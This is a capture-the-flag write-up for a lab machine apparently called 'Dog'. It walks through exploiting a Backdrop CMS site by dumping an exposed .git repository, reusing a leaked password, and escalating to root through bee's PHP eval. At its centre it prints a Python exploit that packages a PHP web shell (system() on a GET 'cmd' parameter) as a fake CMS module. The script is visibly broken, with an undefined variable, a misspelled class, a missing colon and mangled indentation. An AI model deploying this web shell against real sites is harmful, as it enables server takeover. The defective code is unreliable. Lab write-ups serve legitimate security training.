# Dog

# 1. Enumeration

Start enumerating ports, there are only two open ports, check the web application at first instance

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image.png)

A blog talking about dogs and their issues

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%201.png)

We can login and reset password, but apparently we cannot register ourselves

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%202.png)

It is powered by backdrop Content Management System which is open source written in php

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%203.png)

We can see its repository on github, and perform a quick checking of access to files that we don’t suppose to, we even have access to `robots.txt` but not useful information were found in there

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%204.png)

We have access to `.git` directory which means that we can extract full repository content from here

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%205.png)

Without using tools yet we have got a username

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%206.png)

# 2. User flag

Using `git-dumper` we can extract all source code into a directory

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%207.png)

We can perform a manual scanning review on configuration and settings file, where we found a password  

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%208.png)

A hash salt is also present 

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%209.png)

We need to find usernames in here, the first we found didn’t work, use the domain as filter to find `Tiffany`

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2010.png)

Her email address is in an update settings file

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2011.png)

Log in the graphical interface as Tiffany

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2012.png)

We have a lot of users with “administrator” role in here

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2013.png)

Until now, we haven’t found CMS version, use this same filter to find an authenticated Remote Code Execution

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2014.png)

We have and exploit that creates a php reverse shell and a module.info file, packages them into a zip archive and install it as a module, Once installed the reverse can be triggered by simply sending a GET request to the file

```python
import os
import time
import zipfile
import sys

def create_files():
	info_content = """
    type = module
    name = Block
    description = Controls the visual building blocks a page is constructed
    with. Blocks are boxes of content rendered into an area, or region, of a
    web page.
    package = Layouts
    tags[] = Blocks
    tags[] = Site Architecture
    version = BACKDROP_VERSION
    backdrop = 1.x

    configure = admin/structure/block

    ; Added by Backdrop CMS packaging script on 2024-03-07
    project = backdrop
    version = 1.27.1
    timestamp = 1709862662
    """
    shell_info_path = "shell/shell.info"
    os.makedirs(os.path.dirname(shell_info_path), exist_ok=True)
    with open(shell_info_path, "w") as file:
	    file.write(info.content)
	  
	  shell_content =  """
    <html>
    <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if(isset($_GET['cmd']))
    {
    system($_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html>
    """
    shell_php_path = "shell/shell.php"
    with open(shell_php_path, "w") as file:
	    file.write(shell_content)
	  return shell_info_path, shell_php_path

def create_zip(info_path, php_path):
	zip_filename = "shell.zip"
	with zipfile.Zipfile(zip_filename, "w") as zipf:
		zipf.write(info_path, arcname='shell/shell.info')
		zipf.write(php_path, arcname='shell/shell.php')

def main(url):
	print("Remote command execution exploit")
	print("Evil module generating...")
	
	info_path, php_path = create_files()
	zip_filename = create_zip(info_path, php_path)
	
	print("Evil module generated!", zip_filename)
	print("Go to " + url + "/admin/modules/install and upload the " +
          zip_filename + " for Manual Installation.")
    time.sleep(2)

    print("Your shell address:", url + "/modules/shell/shell.php")
if __name__ == "__main__":
	if len(sys.argv) < 2
		print("Usage: python script.py [url]")
	else:
		main(sys.argv[1])
```

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2015.png)

The zip file were generated and it indicates to go ourselves to install the module to be aware of what is happening. In this dashboard section we find a warning announcing that zip files are not allowed due to its extension is not loaded

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2016.png)

Try with manual installation

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2017.png)

Only `.tar.gz` files are allowed

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2018.png)

Use the files that previously generated by the python script and transform them into the required compatible format

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2019.png)

Once the installation is completed successfully

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2020.png)

Access to the shell using the `cmd` variable, during enumeration of users with valid shells, we identify johncusack, further investigation revealed that this user reused Tiffany’s password, which allowed successful ssh authentication

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2021.png)

# 3.Priv esc

As johncusack user we can run as root bee binary

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2022.png)

Basically this tool helps developers to automate tasks, execute code and access content efficiently in backdrop CMS

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2023.png)

After checking its flags we found that it allows to execute php eval function

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2024.png)

Immediately we ran `system(”id”)` command in the home directory but it didn’t work

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2025.png)

So we checked the status of the installation, and received a message pointing out that the command should be run where the backdrop files are located

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2026.png)

No it is working

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2027.png)

Root shell is as simple as

![image.png](Dog%20207b952552918059ae99cbb25a8392ef/image%2028.png)

Machine pwned!!!@#